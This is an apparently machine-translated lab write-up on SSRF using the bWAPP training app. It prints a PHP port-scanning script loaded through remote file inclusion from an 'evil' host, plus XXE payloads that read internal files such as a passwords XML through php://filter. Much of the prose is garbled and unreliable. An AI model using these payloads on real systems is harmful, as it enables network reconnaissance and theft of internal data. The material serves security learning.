SSRF
(Server-side Request Forgery, server request forgery) vulnerability, an attacker constructs a request forgery is an attack initiated by the server a request by the attacker.
SSRF harm
* port scanning
* files using the file protocol to read local files
* Intranet web application fingerprinting
* attack within the network web
harm port scan and read the file will be reflected when the wait for the next practice;
vulnerability discovery:
which originate outside local network requests are likely to exist SSRF vulnerability, citing image loading download, share pages, and more;
see the existence url parameter of type, then you can try the existence of SSRF vulnerabilities;
do two labs to reinforce SSRF:
server-side request forgery (SSRF) is to bypass access controls such as firewalls.
This Web proxy server as the following:
1.使用RFI进行端口扫描。
2.使用XXE访问内部网络上的资源。
3.使用XXE崩溃我的Samsung SmartTV(CVE-2013-4890)
This experiment gives us three such task, which is in the drone bee-box environment to do experiments, I do not have a third experiment environment, personally I feel that two experiments do understand SSRF almost the same.
RFI port scanning using
Click on the first gave us a port scan attack script;
to review the way under the code audit knowledge of php:
<?php>
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";//echo输出函数
if(isset($_REQUEST["ip"]))//判断是否提交了ip
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);//列出几个需要扫描的端口
$results = array();
foreach($ports as $port)//遍历数组
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))//fsockopen函数建立连接,端口扫描
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");//返回给定端口号和协议名的相关服务信息
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
Then use the remote file include vulnerability to do a port scan scripts, has been given here is similar to a remote file http://192.168.191.6/evil/ssrf-1.txt
I here attack aircraft is 192.168.191.6, attack aircraft is my windows ;
visit the website to enter:
? after clicking go will find the url becomes: http: //192.168.191.6/bWAPP/rlfi.php language = lang_en.php & action = go
is obviously a file that contains the vulnerability, exploit this vulnerability by constructing a combined SSRF we can port scanning the script server initiated the request so as to achieve the purpose of the attack;
there are two different ways you can add parameters to capture ipforward get request by the way;
you can also use the Firefox browser plug-ins hackbar, because hackbar now charge me with It is Max hackbar;
FIG configured get request foward successful attack embodiment;
FIG Firefox plugin can use to achieve these results;
The use of resources on the internal network access XXE
Click on the second pass, we will give ssrf-2.txt file based on the file content
#Accesses a file on the internal network (1)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
#Accesses a file on the internal network (2)
#Web pages returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
We should be able to see the code here should think of is to use XML attack SSRF read in conjunction with the attack's file:
enter XXE vulnerabilities screen, click Any bugs were Ethereal:
sent to the repeater module
found in the xml file will modify the xml file ssrf- 2.txt first send:
find four is not accessible;
but we can get through the contents of this vulnerability, access to data through /bWAPP/passwords/heroes.xml in base64 encoded.
Decoding:
Further get internal network resources (to which the use of the protocol and file protocol php);
Oh also came to understand a little bit of knowledge and wanted to take me big brother.